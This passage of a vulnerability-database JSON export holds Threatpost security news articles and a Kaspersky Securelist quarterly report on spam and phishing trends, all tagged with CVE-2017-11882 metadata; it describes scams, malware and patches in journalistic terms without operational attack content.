[sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-03-16T15:12:29", "type": "threatpost", "title": "Katie Moussouris on Microsoft, Trustworthy Computing and the Evolution of the Security Community", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-24T18:59:56", "id": "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "href": "https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/75032/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:58", "description": "[](<https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/>)Windows 8 isn\u2019t yet a week old, but the scammers and phishing crews already are taking their swings at it, setting up new campaigns based on the shiny new operating system. Security researchers have identified a new scareware campaign playing off of the Windows 8 launch, as well as a phishing email trying the same tack.\n\nThe public release of Windows 8 was just last Friday, Oct. 26, and most people probably haven\u2019t even seen the OS in person yet. But that\u2019s not stopping the scammers from trying to make a buck off the back of Microsoft\u2019s work. This shouldn\u2019t come as a surprising development, given that these crews use virtually every major news event, natural disaster and celebrity scandal as a money-making opportunity. \n\nThis time, the Windows 8 launch has inspired a new strain of scareware\u2013surely not the last\u2013that purports to be the \u201cWin 8 Security System\u201d and, of course, warns victims about a series of non-existent threats on their PCs. The scareware shows users a warning, telling them that their machines are infected and informing them that they should register their copy of the scareware in order to see what the threats are and remove them, according to an [analysis from Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/theyre-here-threats-leveraging-windows-8/>).\n\nUsers often will come across these fake antivirus or scareware threats on either compromised legitimate Web sites or malicious sites. Scammers will try to compromise popular legitimate sites, such as news sites, social media sites and others and insert some malicious code onto the sites. When users visit a compromised site, they may see a pop-up window telling them that their machine is infected. Usually, clicking on any link in the pop-up will download the scareware, which could then require a payment of $50 or $100 in order to remove it.\n\nScammers rely on users searching for popular terms, such as Windows 8, in order to land on the malicious sites they control, so they tie their campaigns to trending terms. The researchers at Trend Micro also came across a phishing campaign that\u2019s tied to Windows 8, trying to goad them into downloading a free copy of the new OS. Rather than a free version of Windows 8, the victim gets a request for their personal data, including name, email and other details. \n\nTo be clear, the only way you\u2019re getting Windows 8 for free is when you buy a new PC or tablet.\n", "cvss3": {}, "published": "2012-11-01T15:32:54", "type": "threatpost", "title": "Scareware and Phishing Scams Play on Windows 8 Launch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:18", "id": "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "href": "https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/77176/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for a multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affected all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": "https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/>)Microsoft on Friday said it has reached a settlement with a Russian programmer it named as a defendant in a lawsuit related to the operation of the notorious [Kelihos botnet](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>). The company said that it no longer believes Andrey N. Sabelnikov was the operator of the botnet, but was instead responsible for writing some code that was later used by the botnet.\n\nThis is a departure from the company\u2019s earlier statements, which painted Sabelnikov as someone \u201cresponsible for the operations of the Kelihos botnet.\u201d After working with researchers at Kaspersky Lab and other organizations to take down the Kelihos bothet in the autumn of 2011, Microsoft amended its original complaint to include Sabelnikov as a defendant. The company alleged in a complaint filed in U.S. District Court in January that not only did Sabelnikov [write some of the Kelihos code](<https://threatpost.com/microsoft-adds-kelihos-botnet-operator-civil-complaint-012412/>), but he helped run the botnet.\n\n\u201cIn today\u2019s complaint, Microsoft presented evidence to the court that Mr. Sabelnikov wrote the code for and either created, or participated in creating, the Kelihos malware. Further, the complaint alleges that he used the malware to control, operate, maintain and grow the Kelihos botnet. These allegations are based on evidence Microsoft investigators uncovered while analyzing the Kelihos malware. Microsoft also alleges that Mr. Sabelnikov registered more than 3,700 \u2018cz.cc\u2019 subdomains from Mr. Piatti and dotFREE Group SRO, and misused those subdomains to operate and control the Kelihos botnet,\u201d Richard Boscovich, a senior staff attorney in the Microsoft Digital Crimes Unit, wrote in a [blog post at the time](<https://blogs.technet.com/b/microsoft_blog/archive/2012/01/23/microsoft-names-new-defendant-in-kelihos-case.aspx?Redirected=true>). \n\nNow, Microsoft is taking a somewhat different tack. Rather than accusing Sabelnikov of running the Kelihos botnet, the company [released a statement](<https://blogs.technet.com/b/microsoft_blog/archive/2012/10/19/microsoft-reaches-settlement-with-second-kelihos-defendant.aspx?Redirected=true>) saying that he merely wrote some of the malware\u2019s code. As a result, the company and the programmer reached an undisclosed out-of-court settlement.\n\n\u201cMicrosoft and St. Petersburg software programmer Andrey Sabelnikov have entered into a Settlement Agreement in the matter of Microsoft v. Sabelnikov. During the negotiations, after reviewing the evidence provided by Microsoft and engaging in discussions, the parties have come to an understanding that Mr. Sabelnikov wrote code that was used in the Kelihos botnet code, but the programmer is not the operator of the botnet or involved in its activities. After a review and understanding of all of the details of the case, the parties were able to enter into a confidential settlement agreement in this matter, which resolves the dispute between the parties,\u201d Boscovich wrote on Friday.\n\nMicrosoft has been quite aggressive in its efforts to disrupt and take down botnets in the last couple of years, using both technical and legal tactics to knock the networks offline. The company has gone after several different botnets, with varying degrees of fervor and success, but the Kelihos operation was the first time that Microsoft had named any individuals as defendants in its legal complaints. Until then it had focused on hosting providers or other corporate entities allegedly involved in botnet operations.\n", "cvss3": {}, "published": "2012-10-19T19:01:33", "type": "threatpost", "title": "Microsoft Settles With Kelihos Botnet Defendant, Says He Didn't Run the Network", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:21", "id": "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "href": "https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/77135/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "description": "[](<https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/>)Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. These are file types that are designed to invoke automatic actions during normal use of the files. While they can be very valuable productivity tools, they can also be used by attackers to try and compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "cvss3": {}, "published": "2010-03-01T14:26:26", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:22:38", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Microsoft is planning to disable support for the weak SSLv3 protocol in Internet Explorer at some undetermined point in the future, and also will remove support for it in the company\u2019s online services soon.\n\nThe security and utility of SSLv3 has been an issue for a long time, but it came into sharper focus earlier this month when researchers at Google released details of a [new attack known as POODLE](<http://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) that enables an attacker to decrypt protected content under certain circumstances. If an attacker has control of a target\u2019s Internet connection and can force the victim to run some Javascript in her browser, then he can eventually decrypt the content of a session protected by SSLv3. To do so, the attacker needs to be able to force a connection using the outdated protocol, and that can be done by forcing a failed secure connection between a server and client, which will trigger the server to try and renegotiate the secure connection using a different protocol.\n\nSSLv3 is nearly 15 years old and experts have considered it to be a security risk for a long time and have recommended that site operators use newer alternatives such as TLS 1.2. But there are plenty of sites that still support SSLv3 and IE 6, an artifact of a browser, doesn\u2019t support any transport layer security protocols newer than SSLv3 by default. Microsoft officials said the company is planning to remove the ability for IE to fall back to SSLv3 and eventually will disable the protocol by default altogether.\n\n\u201cWe are committed to helping protect our customers and providing the best possible encryption to protect their data. To do this, we\u2019re working to disable fallback to SSL 3.0 in IE, and disable SSL 3.0 by default in IE, and across Microsoft online services, over the coming months,\u201d Tracey Pretorius of the MSRC said in a blog [post](<http://blogs.technet.com/b/msrc/archive/2014/10/29/security-advisory-3009008-released.aspx>).\n\n\u201cMillions of people and thousands of organizations around the world rely on our products and services every day, and while the number of systems that rely on SSL 3.0 exclusively is very small, we recognize that, particularly for enterprises, disabling the protocol may cause some impact. That\u2019s why we\u2019re taking a planned approach to this issue and providing customers with advance notice.\u201d\n\nMicrosoft also is providing a FixIt tool that allows users to disable SSLv3 support in any supported version of IE.\n", "cvss3": {}, "published": "2014-10-29T14:56:06", "type": "threatpost", "title": "Microsoft Plans to Disable SSLv3 in IE, All Online Services", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-05T15:10:14", "id": "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "href": "https://threatpost.com/microsoft-plans-to-disable-sslv3-in-ie-all-online-services/109087/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:25", "description": "The Hungarian research facility that helped discover Duqu, the [much-blogged about](<https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/>) Trojan, has now released an open-source toolkit that can be used to help detect traces and instances of the worm.\n\nThe Laboratory of Cryptography and System Security (CrySys) at the Budapest University of Technology and Economics developed the [Duqu Detector Toolkit v1.01](<http://www.crysys.hu/duqudetector.html>) to be used on computers and networks where the malware may have already been removed from the system. Duqu \u2013 a cousin of the Stuxnet worm that infected uranium enrichment facilities in Iran, famously had a hard-coded 36 day lifespan. But ystems may still retain certain Duqu files even after the virus has deactivated itself.By focusing on what they refer to as \u201csuspicious files,\u201d the toolkit can \u201cdetect new, modified versions of the Duqu threat,\u201d CrySys said. \n\nLike other toolkits, CrySys claims the tool could still generate false positives and therefore encourages a professional looks over the log files of each test.\n\nAs Threatpost [previously reported](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), users can be infected with Duqu after opening a particular Word document that exploits a flaw in Windows\u2019 Win32k TrueType font parsing engine and lead to remote code execution. Microsoft has maintained they\u2019re working on a patch for the bug but in the meantime, [released a workaround](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) for the kernel flaw late last week.\n", "cvss3": {}, "published": "2011-11-10T16:17:49", "type": "threatpost", "title": "New Toolkit Able to Track and Trace Duqu Worm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:22", "id": "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "href": "https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/75879/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2019-09-11T10:31:23", "description": "\n\n## Quarterly highlights\n\n### Spam through Google services\n\nIn the second quarter of 2019, scammers were making active [use of cloud-based data storage services](<https://www.kaspersky.com/blog/spam-through-google-services/27228/>) such as Google Drive and Google Storage to hide their illegal content. The reasoning behind this is simple: a link from a legitimate domain is seen as more trustworthy by both users and spam filters. Most often, such links point to text files, tables, presentations, and other documents containing text and a link, say, to an advertised product or phishing page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/09/11085513/spam-report-q2-2019-1.png>)\n\nAlso this past quarter, cybercriminals actively used Google Calendar to send out invitations to non-existent meetings, adding phishing links to fields filled out by the organizer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/09/11085541/spam-report-q2-2019-2.png>)\n\nThrough Google Photos, fraudsters shared photos accompanied by a comment containing information about a money transfer and a contact email address. It's a traditional scheme: before receiving the promised money, the victim is asked to pay some kind of \"service fee\", whereupon the attackers vanish into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/09/11085606/spam-report-q2-2019-3.png>)\n\nGoogle Forms, a tool for creating forms and surveys, was also actively used by cybercriminals to harvest users' personal data and send commercial spam.\n\n### Bitcoin ransomware targets businesses\n\nUntil recently, the main blackmailing tool of cryptocurrency-hungry scammers was [sextortion](<https://www.kaspersky.com/blog/cia-sextortion/27146/>). However, their attention gradually began to switch from individual users to companies, which began to receive threats of [reputational harm to their website](<https://www.kaspersky.com/blog/spam-extortion-reputation/27362/>).\n\nOnce more, it's very straightforward. A request for the transfer of 0.3\u20130.5 bitcoin (around $4,200) is sent to the company's public email addresses (or via its online feedback form). In case of refusal, the cybercriminals threaten to send abusive messages supposedly from the victim company through the contact forms of 13 million websites, as well as to mail out aggressive spam in the company's name to 9 million email addresses. After that, they claim that the Spamhaus Project will recognize the victim's website as a source of spam and block it forever.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/09/11085634/spam-report-q2-2019-4.png>)\n\n### Global sporting events\n\nMajor sporting events attract not only millions of fans, but also numerous scammers looking to exploit them. As such, in Q2 we detected a spam mailing timed to coincide with the 2019 UEFA Europa League Final in Baku. Recipients were asked to guess the winner of the match and earn the chance to win up to \u00a3200,000.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084234/spam-report-q2-2019-6.png>)\n\nFor this, they had to follow the link in the message, provide some personal data, and predict which team would win. The information collected could then be used for fraudulent attacks and more spam mailings. There's also an extended version of this scheme: after some time, the victim receives a notification that their prediction was correct and their winnings are ready for collection \u2014 for which a small fee is required, naturally.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084244/spam-report-q2-2019-7.png>)\n\nBut scammers did not limit themselves to soccer fans. Q2 saw equally stellar golf and hockey tournaments in the shape of the Stanley Cup and the US Open.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084315/spam-report-q2-2019-8.png>)\n\nUsers were invited to watch broadcasts of these events, which, soon after starting, were blocked by a window prompting to set up an account:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084341/spam-report-q2-2019-9.png>)\n\nOn clicking the Create My Account button, a page opens asking to provide an email address and create a password:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084418/spam-report-q2-2019-10.png>)\n\nHowever, on filling out all the fields and clicking the Continue button, the victim is required to verify the account, for which some more personal information is required \u2014 namely, bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084457/spam-report-q2-2019-11.png>)\n\nThe fraudsters report that the money will not be debited from the card, rather the payment data is needed simply for verification, since customers should supposedly be located in a country where the website is licensed to distribute such content. But even if you decide to undergo this \"verification,\" you won't see the end of the match, of course. Instead, your data and payment information will be in the hands of the scammers.\n\n### Global TV and movie premieres\n\nAs we already wrote several times in past reports, fraudsters keep a close eye on world events and adapt their schemes to them. We found a ruse similar to the previous one, aimed at fans of the Marvel Cinematic Universe ahead of the release of the latest _Avengers_ installment:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084526/spam-report-q2-2019-12.png>)\n\nBut Q2 wasn't all about _Avengers_. It also witnessed the long-awaited premiere of the last season of _Game of Thrones_, and our statistics showed that the following week the number of scam resources mentioning the series increased fourfold against the month before the release. One of the most common fraudulent schemes was simulating the generation of codes for _Game Of Thrones Conquest_, a spin-off mobile game.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084549/spam-report-q2-2019-13.png>)\n\nTo get a code, the user had to fill out a form, specifying the number of coins that they would like to receive in the game.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084621/spam-report-q2-2019-14.png>)\n\nAfter completing all the fields, the system goes into \"code generation\" mode. For the sake of authenticity, on-screen messages appear about connecting to servers and the like.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084648/spam-report-q2-2019-15.png>)\n\nThe generated code is not shown to the user until non-robot status is confirmed. This requires clicking a link and completing some kind of task.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084716/spam-report-q2-2019-16.png>)\n\nAt this point, the user might be asked to take a survey, play a lottery, provide details (phone number, postal address), subscribe to a paid SMS service, install adware (which redirects all user searches, harvests information about online activity, and resists deletion), or do something else. The nature of the task is determined by the partner network, one of whose sites the user is redirected to. The network, for its part, is selected based on the country of residence: it should match the regional language and local advertising laws.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084744/spam-report-q2-2019-17.png>)\n\nThe upshot is unpleasant, but predictable: the victim is either led around various partner sites until they tire of filling out forms and playing lotteries, or they are rewarded with a random set of symbols that has nothing to do with a genuine code and only mimics the format.\n\n### Tax refunds\n\nThe second quarter of the year sees the deadline for filing tax returns and tax refund applications in many countries. This is utilized by scammers who capitalize on users' carelessness and fear of missing the deadline. Phishing emails are sent out saying that the user is entitled to a tax refund (large enough to arouse interest). The reason given for the rebate might be a standard law procedure or a system error.\n\nSome mailings employ a well-known technique whereby the user is given a limited amount of time to take action. For instance, in an email seemingly from HMRC (Her Majesty's Revenue and Customs, the UK tax service), victims had to follow the link and fill out the form immediately, while fake CRA (Canada Revenue Agency) letters were giving the recipient 24 hours, otherwise a tax refund would not be possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084802/spam-report-q2-2019-18.png>)\n\nPhishing pages at the end of links in such messages are aimed at stealing various personal information: account passwords, answers to secret questions, names of close relatives, their dates of birth, full information about bank cards, including CVV code, and much more. In some examples, on clicking a link, a chain of actions had to be completed, such as entering basic information (name, social security number), followed by more detailed data, and then at the final step specifying bank card numbers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084836/spam-report-q2-2019-19.png>)\n\nBesides phishing links, scammers also sent malicious attachments. Cybercriminals tried to convince users to open them by citing errors in the return form that were in need of urgent correction. The malicious file, detected as Trojan-Downloader.MSOffice.SLoad.gen, was disguised as a copy of the return form. If the user gave permission to run the macro, another malicious executable was downloaded and launched.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084903/spam-report-q2-2019-20.png>)\n\nAnother bulk email attachment was detected as Trojan.Win32.Agentb.jofi, a multifunctional backdoor that provides remote access to the infected machine. Its capabilities include monitoring keystrokes, stealing passwords for browsers and Windows accounts, recording video from the computer's webcam, and executing commands received from C&amp;C servers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084933/spam-report-q2-2019-21.png>)\n\n### Tourist phishing\n\nIn anticipation of the summer holidays, we registered an increase in the number of phishing mailings [aimed at travelers](<https://www.kaspersky.com/blog/travel-phishing/27078/>). Everything was in play: Airbnb emails with accommodation offers at tempting prices, phishing sites mimicking Booking.com, fake travel sites, and so on.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084956/spam-report-q2-2019-22.png>)\n\nNeither did attackers ignore airlines \u2014 both large international carriers and small local firms. For example, here's a mailing we detected informing customers that their account has exceeded some kind of limit and requesting confirmation of account data within 24 hours.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085016/spam-report-q2-2019-23.png>)\n\nThose who swallowed the bait and clicked the link were redirected to a fake site where they were prompted to fill out an \"authorization\" form. The data, of course, went straight to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085038/spam-report-q2-2019-24.png>)\n\nMessages in another scam mailing scheme looked like official ticket booking confirmations. The fraudsters used the same phishing link for the booking number and the \"view details\" option. However, instead of the promised data, the user was taken to a page specially set up to steal personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085112/spam-report-q2-2019-25.png>)\n\n### Phishing emails supposedly from email services\n\nThe vast majority of scam emails aimed at stealing login credentials for email services imitate messages from the email services themselves. Scammers try to make their fake messages as believable as possible: the sender's address is similar to the real one, the message uses the correct logos, and there are links to official resources as well as signatures.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085128/spam-report-q2-2019-26.png>)\n\nThe email text, the scammers also try to make convincing. It usually starts by reporting some kind of problem with the victim's account, followed by a description of what needs to be done, which entails either following a link or opening an attachment. To intimidate the recipient further, mention is made of what can happen to the account in case of failure to perform the specified actions (deletion, suspension), with specific time frames.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085144/spam-report-q2-2019-27.png>)\n\nAtypical examples are also encountered: the message might be disguised as business correspondence (usually such messages contain a malicious attachment), and the text may not mention email accounts at all. On clicking the link in such an email, the user is taken to a page where they are asked to enter email account details in order to view a (nonexistent) document.\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q1 2019 \u2013 Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27092903/en-spam-internet.png>)\n\nIn Q2 2019, the largest share of spam was recorded in May (58.71%). The average percentage of spam in global mail traffic was 57.64%, up 1.67 p.p. against the previous reporting period.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27092954/en-countries-spam.png>)\n\nThe top lines in the list of spam sources remain the same: in first place was China (23.72%), the US came second (13.89%), Russia remained third (4.83%), and Brazil took fourth (4.62%) \u2014 only the fifth line differs from last quarter: France (3.11%) pushed Germany out of the Top 5.\n\n### Spam email size\n\n_Spam email size, Q1 and Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093021/spam-size.png>)\n\nIn Q2 2019, the share of very small emails (up to 2 KB) in spam rose against Q1 by 13.33 p.p. to 87.31%. Meanwhile, the share of 5\u201310 KB messages fell by 4.52 p.p. to 2.27%. Messages 10\u201320 KB in size were fewer in numbers than most other ones: their share was 1.98%, down 3.13 p.p. on last quarter. The proportion of 20\u201350 KB messages amounted to 2.10%, versus 3% in the previous reporting period.\n\n### Malicious attachments, malware families\n\n_Number of Mail Anti-Virus triggerings, Q1 2019 \u2013 Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093045/en-spam-antivir.png>)\n\nIn Q2 2019, our security solutions detected a total of 43,907,840 malicious email attachments. May was the quarter's hottest month with almost 16 million mail antivirus triggers, while April was the coolest (2 million fewer).\n\n_Top 10 malicious attachments in mail traffic, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093114/top10-mail.png>)\n\nIn Q2, the malware Exploit.MSOffice.CVE-2017-11882.gen (7.53%) came first in terms of prevalence in mail traffic. In second position was Worm.Win32.WBVB.vam (4.24%), and Trojan.MSOffice.SAgent.gen (2.32%) took third.\n\n_Top 10 malware families in mail traffic, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093143/top10-mail-2.png>)\n\nLooking at malware families, we see a slightly different picture. In first place is the [Andromeda bot family](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>) (8.00%), whose individual members took only fourth and sixth places in the malware Top 10. Close behind is the Exploit.MSOffice.CVE-2017-11882 family (7.64%), a set of exploits for the Microsoft Office suite. In third place is the [Worm.Win32.WBVB](<https://threats.kaspersky.com/en/threat/Worm.Win32.WBVB/>) family of worms (4.74%), written in Visual Basic.\n\nCountries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093212/en-countries-targets.png>)\n\nGermany continues to occupy top spot by share of mail antivirus triggerings, posting 10.05% this quarter. Russia finished second (6.16%), nudging Vietnam (5.98%) into third.\n\n## Statistics: phishing\n\nIn Q2 2019, the Anti-Phishing system blocked **129,933,555** attempts to direct users to scam websites. **12.34%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nThe country with the largest share of users attacked by phishers in Q2 2019 was Greece (26.20%), up from sixth place in the quarter before having added 10.34 p.p.\n\n_Geography of phishing attacks, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093240/en-map-phishing.png>)\n\nGreece is followed by Venezuela (25.67%), which rose to second from fifth, adding 8.95 p.p. Brazil came in third (20.86%), falling from first place, despite losing less than 1 p.p. Australia (17.73%) failed to medal this time around, while Portugal (17.47%) rounds off the Top 5.\n\n**Country** | ** %*** \n---|--- \nGreece | 26.20% \nVenezuela | 25.67% \nBrazil | 20.86% \nAustralia | 17.73% \nPortugal | 17.47% \nSpain | 15.85% \nAlgeria | 15.51% \nChile | 15.47% \nFrance | 14.81% \n \n_* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, credit organizations retain first place by number of attacks \u2014 the share of attacks on banks amounted to 30.68%, which is almost 5 p.p. more than last quarter.\n\n_Distribution of organizations subjected to phishing attacks by category, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093305/en-organizations.png>)\n\nIn second position was payment systems (20.12%), and global Internet portals (18.02%) took third place.\n\n## Conclusion\n\nIn Q2 2019, the average share of spam in global mail traffic fell by **1.67 p.p.** to **57.64%**, while the Anti-Phishing system prevented more than **130 million** redirects to phishing sites, up **18 million** on the previous reporting period.\n\nFirst place in the list of spam sources went to **China** with a share of **23,72%**. Top spot by number of mail antivirus detections was claimed by **Germany** on **10.05%**. Throughout Q2 2019, our security solutions detected a total of **43,907,840** malicious email attachments. The most prevalent malware in mail traffic was **Exploit.MSOffice.CVE-2017-11882.gen** with a share of **7.53%**, while **Backdoor.Win32.Androm**, with an **8%** share, was the most common malicious family.\n\nCybercriminals continue to look for new ways to deliver spam and improve old ones. In Q2, they used popular Google services to distribute spam. Blackmailers are also trying out new methods. Alongside threats to ordinary users, attempts were made to blackmail companies by threatening to send spam mailings in their name.\n\nApart from that, as before, scammers are alive to the zeitgeist and quickly adapt their schemes to high-profile events.", "cvss3": {}, "published": "2019-08-28T10:00:28", "type": "securelist", "title": "Spam and phishing in Q2 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-08-28T10:00:28", "id": "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "href": "https://securelist.com/spam-and-phishing-in-q2-2019/92379/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-05T12:36:39", "description": "\n\n## Quarterly highlights\n\n### The corporate sector\n\nIn Q2 2021, corporate accounts continued to be one of the most tempting targets for cybercriminals. To add to the credibility of links in emails, scammers imitated 